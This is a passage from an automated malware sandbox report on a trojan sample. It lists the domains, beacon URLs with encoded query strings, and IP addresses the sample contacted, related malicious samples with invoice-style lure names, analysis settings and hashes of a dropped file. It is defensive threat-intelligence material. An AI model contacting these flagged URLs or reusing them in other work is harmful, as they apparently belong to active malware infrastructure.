          http://www.thebenefitssherpa.com/i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.ricdevan.com/i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation (3 entries) | safe
          http://www.sajatypeworks.com | 0% | URL Reputation (3 entries) | safe
          http://www.typography.netD | 0% | URL Reputation (3 entries) | safe
          www.sabaidiving.com/i6rd/ | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (3 entries) | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (3 entries) | safe
          http://fontfabrik.com | 0% | URL Reputation (3 entries) | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation (3 entries) | safe
          http://www.blissfulbeeboutique.online/i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (3 entries) | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (3 entries) | safe
          http://www.countrywideeconomy.com/ | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation (3 entries) | safe
          http://www.sandoll.co.kr | 0% | URL Reputation (3 entries) | safe
          http://www.countrywideeconomy.com/i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation (3 entries) | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation (3 entries) | safe
          http://www.sakkal.com | 0% | URL Reputation (3 entries) | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          cityofhouston.info | 103.15.186.68 | true | true | | unknown
          onlinecasinocrazy.com | 119.81.45.82 | true | true | | unknown
          onemoresysadmin.com | 192.0.78.24 | true | true | | unknown
          www.sabaidiving.com | 192.64.147.164 | true | true | | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | false | | high
          toypoodlebreedershome.com | 81.88.52.88 | true | true | | unknown
          www.ricdevan.com | 185.53.177.53 | true | true | | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          thebenefitssherpa.com | 34.102.136.180 | true | false | | unknown
          www.countrywideeconomy.com | 52.58.78.16 | true | true | | unknown
          socialeconomic.net | 51.222.80.112 | true | true | | unknown
          www.socialeconomic.net | unknown | unknown | true | | unknown
          www.onlinecasinocrazy.com | unknown | unknown | true | | unknown
          www.toypoodlebreedershome.com | unknown | unknown | true | | unknown
          www.onemoresysadmin.com | unknown | unknown | true | | unknown
          www.woo.education | unknown | unknown | true | | unknown
          www.cityofhouston.info | unknown | unknown | true | | unknown
          www.thebenefitssherpa.com | unknown | unknown | true | | unknown
          www.blissfulbeeboutique.online | unknown | unknown | true | | unknown
          www.ximibabes.com | unknown | unknown | true | | unknown

                                          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.toypoodlebreedershome.com/i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.ximibabes.com/i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.cityofhouston.info/i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.sabaidiving.com/i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.onlinecasinocrazy.com/i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.thebenefitssherpa.com/i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih | false | Avira URL Cloud: safe | unknown
          http://www.ricdevan.com/i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          www.sabaidiving.com/i6rd/ | true | Avira URL Cloud: safe | low
          http://www.blissfulbeeboutique.online/i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown
          http://www.countrywideeconomy.com/i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih | true | Avira URL Cloud: safe | unknown

                                          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.countrywideeconomy.com | control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | false | | high
          http://www.carterandcone.coml | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.typography.netD | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://fontfabrik.com | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers8 | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.countrywideeconomy.com/ | control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.%s.comPA | explorer.exe, 00000006.00000000.666349326.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | low
          http://www.fonts.com | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.sandoll.co.kr | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.urwpp.deDPlease | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.zhongyicts.com.cn | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmp | false | | high
          http://www.sakkal.com | explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown

                                                                  Contacted IPs

                                                                  Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          52.58.78.16 | www.countrywideeconomy.com | United States | 16509 | AMAZON-02US | true
          192.64.147.164 | www.sabaidiving.com | United States | 19867 | VOODOO1US | true
          23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
          192.0.78.24 | onemoresysadmin.com | United States | 2635 | AUTOMATTICUS | true
          119.81.45.82 | onlinecasinocrazy.com | Singapore | 36351 | SOFTLAYERUS | true
          198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
          185.53.177.53 | www.ricdevan.com | Germany | 61969 | TEAMINTERNET-ASDE | true
          103.15.186.68 | cityofhouston.info | Japan | 2519 | VECTANTARTERIANetworksCorporationJP | true
          34.102.136.180 | thebenefitssherpa.com | United States | 15169 | GOOGLEUS | false
          81.88.52.88 | toypoodlebreedershome.com | Italy | 39729 | REGISTER-ASIT | true
          51.222.80.112 | socialeconomic.net | France | 16276 | OVHFR | true

                                                                  Private

                                                                  IP
                                                                  192.168.2.1

                                                                  General Information

          Joe Sandbox Version: 32.0.0 Black Diamond
          Analysis ID: 412308
          Start date: 12.05.2021
          Start time: 15:45:53
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 12m 34s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: 350969bc_by_Libranalysis (renamed file extension from none to exe)
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of new started processes analysed: 23
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@11/1@12/12
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 18.4% (good quality ratio 16.3%)
          • Quality average: 73.4%
          • Quality standard deviation: 32.1%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 79
          • Number of non-executed functions: 147
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 92.122.145.220, 13.64.90.137, 13.88.21.125, 20.82.209.183, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.143.16, 52.155.217.156, 20.54.26.129, 20.82.210.154
          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                  Simulations

                                                                  Behavior and APIs

Time | Type | Description
15:46:44 | API Interceptor | 1x Sleep call for process: 350969bc_by_Libranalysis.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

Match | Associated Sample Name / URL | Detection | Context
52.58.78.16 | Shipment Document BL,INV and packing List.exe | malicious | www.rjroof.com/bwk/?e0D=4vdMJUauAbypOyncIj3mGOWyxqKYmFP7MPVjyJX0TlZ6LShEClzNARe6HqJLDWz2QsFLyUFcIg==&BRGTb0=DBZH
52.58.78.16 | ProForma Invoice 20210510.exe | malicious | www.rafbar.com/u8nw/?hb8Tz=GTZNlL4u2lC1Us00w2siTAOBcwC+lUBY5op6as4vfiu2ndyHOwS1IzefqZ0oX9Ljvrcn&yVUx=0BIXczdHaL8h5fn
52.58.78.16 | 0a97784c_by_Libranalysis.xlsx | malicious | www.bestpontoonboat.com/et9g/?BZ6=bBMyEahAcXigOvOPgDjmms/4cBV9Wtmdu7/aEd/RWaUwIJILZbsGRx753LFyRZeZoLA0QA==&bdC=7njp7th
52.58.78.16 | Shipping Document.exe | malicious | www.ehealthwy.com/ou59/?nHLD_b=F/wBt/KMP43Itvrx2w7vOpterTaFFbpTrndkSW8YN3woe1RwD49jldLS4YHInyjjH0Fk&kr4Lhj=ndkHzHd
52.58.78.16 | abc73f63_by_Libranalysis.xls | malicious | www.fortwayneduiattorney.com/cca/?LFQLf=DQkKoy4KFmxrpP+4wA/zfG9zgCj3jVN+xnDVxHHDydHerh6N5kUzh47H2mi7uCO64HHP4Q==&PHBtKJ=OlrtB4dp
52.58.78.16 | tgix.exe | malicious | www.physicalrobot.com/oerg/?AtxLpld=JA3D/Abhc4IR3OQLXeXKb6LQIfBkcHsKg4Z3iScHpk6TVSXolV0c13rIH8GpTmaDfWWP&orW=W6L4IdAHz
52.58.78.16 | 60b88477_by_Libranalysis.exe | malicious | www.relaxxation.com/qjnt/?_nLD=mxaFhsYrAcL/dG/heClqDIL9OHFKPqnw/WCTkSguw47Ni2/IMxTsh2aodb9jmZlwyzTK1xgprg==&m0D=AL30QHY
52.58.78.16 | e9777bb4_by_Libranalysis.exe | malicious | www.vaginalmedicine.com/m3rc/?w8i=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&CR=CpCH
52.58.78.16 | NEW ORDER.exe | malicious | www.sanacolitademarijuana.com/u8nw/?GVIp=9bHYKsyT0auyBBl4ZenxQUebR4YwlP18dAkCPCATYDDxMs1xZZCxfJgyFOuaQUe6umYw+kXXjQ==&tzr4=jlIXVLPHc
52.58.78.16 | Ygqayrvpsvjdxblkzsmxymjfnxukvrdvft_Signed_.exe | malicious | www.clinics.life/qku9/?sL3x=wPjLqqQ4Fl5oGjCEKguj45taGc7fhq386dHHgSG17iY4BIOMpTzTtH7Yrt22Fdj2vFYG/3Tb+A==&jrq=e4yt
52.58.78.16 | pVrqrGltiL.exe | malicious | www.gailrichardson.com/qjnt/?lZ9=cQpYuVHXbJG9pZu9oJObHgw0bCNAclVj5UnrwSBC7KRToOBRDRnUcBg681sl3dckQEofebx0YA==&G8bDQ=7nJx1RS0B4MT9t
52.58.78.16 | krJF4BtzSv.exe | malicious | www.hellonetworker.com/oerg/?r6A=2Id0qd+ugAnFeIUXB+gRuO324HEbs4SrVkFnQshNY9xroxdz4sfjr3km3OeVd011T3tb&YL0=8pN4l4
52.58.78.16 | 70pGP1JaCf6M0kf.exe | malicious | www.hellojesse.com/uv34/?Yn=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwF8yKbrEfOE+8NWGOA==&I4=i0GhP0sP
52.58.78.16 | AL-IEDAHINV.No09876543.exe | malicious | www.hellojesse.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwGQbJbX8Wtxo
52.58.78.16 | triage_dropped_file.exe | malicious | www.gailrichardson.com/qjnt/?rTFDm=GBOxAlxXYbRxGd&r6q=cQpYuVHXbJG9pZu9oJObHgw0bCNAclVj5UnrwSBC7KRToOBRDRnUcBg682AmrtQcdlVJ
52.58.78.16 | y6f8O0kbEB.exe | malicious | www.physicalrobot.com/oerg/?mHLD_0=JA3D/Abhc4IR3OQLXeXKb6LQIfBkcHsKg4Z3iScHpk6TVSXolV0c13rIH8GpTmaDfWWP&ndndnZ=UtWlYrO0rhjH
52.58.78.16 | PI34567890987.exe | malicious | www.hellojesse.com/uv34/?S0GHnN=RRipariXRTPx&V488O=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwFwLG6HEIIYv
52.58.78.16 | letterhead.exe | malicious | www.adsandbanners.com/epms/?x4uDfZgH=5FcZQLEIPDinAsdvDU7qvUUfCcL2PSB22LbDCeTr+4owrfaQmoWPWt5F0XzMbxfYzfnp&Cj30v=9rJhur7HoF7lOxC
52.58.78.16 | PaymentAdvice.exe | malicious | www.wildsoulsport.com/c22b/?Uxlt=kpNK1gW9of23sXec3wB2eGXjTzRpIjACDmlXILuFYpTB5bhnZZGkQZKPt/qXQ/DU3yyv&wP9=mfpP2VH
52.58.78.16 | UP3FvzsHWZ.exe | malicious | www.greendaylandscaping.com/r1mo/?uDKH=7Ux04+9wxrtiaQVDDevgGV/B1TtL1QYTp7ylEXK86zgQ//45WeQOOkpXoTmAu+TPv8Ft&-ZPh=1bRpzD

                                                                  Domains

Match | Associated Sample Name / URL | Detection | Context
ext-sq.squarespace.com | PO 367628usa.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | correct invoice.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | SWIFT001411983HNK.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | DOC24457188209927.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | #U4f9b#U5e94#U6750#U6599.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | PP,Sporda.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | BORMAR SA_Cotizaci#U00f3n de producto doc.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | 4LkSpeVqKR.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | PO889876.pdf.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | 202139769574 Shipping Documents.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | wMqdemYyHm.exe | malicious | 198.49.23.145
ext-sq.squarespace.com | d801e424_by_Libranalysis.docx | malicious | 198.185.159.144
ext-sq.squarespace.com | 7824,pdf.exe | malicious | 198.49.23.145
ext-sq.squarespace.com | PO_29_00412.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | DHL_S390201.exe | malicious | 198.185.159.145
ext-sq.squarespace.com | triage_dropped_file.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | Wire transfer.exe | malicious | 198.185.159.144
ext-sq.squarespace.com | mC9LnX9aGE.exe | malicious | 198.49.23.145
ext-sq.squarespace.com | 4x1cYP0PFs.exe | malicious | 198.49.23.145
ext-sq.squarespace.com | SO.xlsm.exe | malicious | 198.185.159.144
shops.myshopify.com | New_Order.exe | malicious | 23.227.38.74
shops.myshopify.com | correct invoice.exe | malicious | 23.227.38.74
shops.myshopify.com | PP,Sporda.exe | malicious | 23.227.38.74
shops.myshopify.com | Purchase Order.exe | malicious | 23.227.38.74
shops.myshopify.com | PAYMENT INSTRUCTIONS COPY.exe | malicious | 23.227.38.74
shops.myshopify.com | New Order.exe | malicious | 23.227.38.74
shops.myshopify.com | slot Charges.exe | malicious | 23.227.38.74
shops.myshopify.com | WAkePI6vWufG5Bb.exe | malicious | 23.227.38.74
shops.myshopify.com | PO09641.exe | malicious | 23.227.38.74
shops.myshopify.com | PO#6275473, Shipping.exe | malicious | 23.227.38.74
shops.myshopify.com | 4LkSpeVqKR.exe | malicious | 23.227.38.74
shops.myshopify.com | PO889876.pdf.exe | malicious | 23.227.38.74
shops.myshopify.com | Il nuovo ordine e nell'elenco allegato.exe | malicious | 23.227.38.74
shops.myshopify.com | Order Euro 890,000.exe | malicious | 23.227.38.74
shops.myshopify.com | winlog.exe | malicious | 23.227.38.74
shops.myshopify.com | products order pdf .exe | malicious | 23.227.38.74
shops.myshopify.com | REVISED ORDER.exe | malicious | 23.227.38.74
shops.myshopify.com | e9777bb4_by_Libranalysis.exe | malicious | 23.227.38.74
shops.myshopify.com | NEW ORDER.exe | malicious | 23.227.38.74
shops.myshopify.com | PROFORMA INVOICE210505133444.xlsx | malicious | 23.227.38.74

                                                                  ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02US | 7bYDInO.rtf | malicious | 52.210.171.182
AMAZON-02US | nT5pUwoJSS.dll | malicious | 54.247.61.18
AMAZON-02US | 1c60a1e9_by_Libranalysis.rtf | malicious | 44.230.85.241
AMAZON-02US | Order 122001-220 guanzo.exe | malicious | 18.219.49.238
AMAZON-02US | main_setup_x86x64.exe | malicious | 104.192.141.1
AMAZON-02US | A6FAm1ae1j.exe | malicious | 3.138.180.119
AMAZON-02US | New_Order.exe | malicious | 75.2.115.196
AMAZON-02US | NAVTECO_R1_10_05_2021,pdf.exe | malicious | 13.58.50.133
AMAZON-02US | YDHhjjAEFbel88t.exe | malicious | 99.83.175.80
AMAZON-02US | yU7RItYEQ9kCkZE.exe | malicious | 99.83.175.80
AMAZON-02US | Shipment Document BL,INV and packing List.exe | malicious | 52.58.78.16
AMAZON-02US | 4xPBZai06p.dll | malicious | 13.225.75.73
AMAZON-02US | 0OyVQNXrTo.exe | malicious | 3.142.167.54
AMAZON-02US | rAd00Nae9w.dll | malicious | 13.225.75.73
AMAZON-02US | DOC24457188209927.exe | malicious | 13.224.193.2
AMAZON-02US | user-invoice-8488888.doc | malicious | 104.192.141.1
AMAZON-02US | user-invoice-8488888.doc | malicious | 104.192.141.1
AMAZON-02US | ProForma Invoice 20210510.exe | malicious | 13.113.228.117
AMAZON-02US | PO9448882.exe | malicious | 18.219.49.238
AMAZON-02US | jjbxg8kh5X.exe | malicious | 52.216.177.83
VOODOO1US | KqXtlrj1Vk.exe | malicious | 192.64.147.164
VOODOO1US | rona.exe | malicious | 192.64.147.249
VOODOO1US | z2xQEFs54b.exe | malicious | 192.64.147.150
VOODOO1US | winlog.exe | malicious | 192.64.147.249
VOODOO1US | Purchase Order.exe | malicious | 192.64.147.164
VOODOO1US | Swift File_pdf.exe | malicious | 192.64.147.249
VOODOO1US | Drawings.xlsm | malicious | 192.64.147.164
VOODOO1US | RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXE | malicious | 192.64.147.164
VOODOO1US | 990109.exe | malicious | 192.64.147.150
VOODOO1US | Proforma Invoice.exe | malicious | 192.64.147.164
VOODOO1US | CSq58hA6nO.exe | malicious | 192.64.147.164
VOODOO1US | NQQWym075C.exe | malicious | 192.64.147.164
VOODOO1US | kvdYhqN3Nh.exe | malicious | 192.64.147.150
VOODOO1US | https://www.dropbox.com/l/AACILqMf9nyLCBAtI7us4fP05O8j3-IIsZk | malicious | 192.64.147.153
CLOUDFLARENETUS | 7bYDInO.rtf | malicious | 104.16.18.94
CLOUDFLARENETUS | Invoice...exe | malicious | 172.67.188.154
CLOUDFLARENETUS | Tek_multiloader_5.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | PO 367628usa.exe | malicious | 66.235.200.147
CLOUDFLARENETUS | Statement of Account April-2021.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | 2070121SN-WS for Woosim i250MSR.pif.exe | malicious | 162.159.133.233
CLOUDFLARENETUS | FACTURA COMERCIAL_________________________________________________________PDF__.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | Quotation.exe | malicious | 162.159.130.233
CLOUDFLARENETUS | 8wx078Pm3P.exe | malicious | 172.67.150.158
CLOUDFLARENETUS | GUaL8Nw228.exe | malicious | 104.21.30.57
CLOUDFLARENETUS | 8wx078Pm3P.exe | malicious | 172.67.150.158
CLOUDFLARENETUS | qn8nIbPPCO.exe | malicious | 172.67.151.39
CLOUDFLARENETUS | viMLlTHg3d.exe | malicious | 172.67.160.89
CLOUDFLARENETUS | 8n6dlwyR8l.exe | malicious | 104.21.58.140
CLOUDFLARENETUS | GUaL8Nw228.exe | malicious | 104.21.30.57
CLOUDFLARENETUS | qn8nIbPPCO.exe | malicious | 104.21.72.139
CLOUDFLARENETUS | viMLlTHg3d.exe | malicious | 172.67.160.89
CLOUDFLARENETUS | Technical data sheet.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | 8n6dlwyR8l.exe | malicious | 172.67.160.89
CLOUDFLARENETUS | v8wtfyQr7r.exe | malicious | 104.21.55.224

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\350969bc_by_Libranalysis.exe.log
                                                                  Process:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):5.350128552078965
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
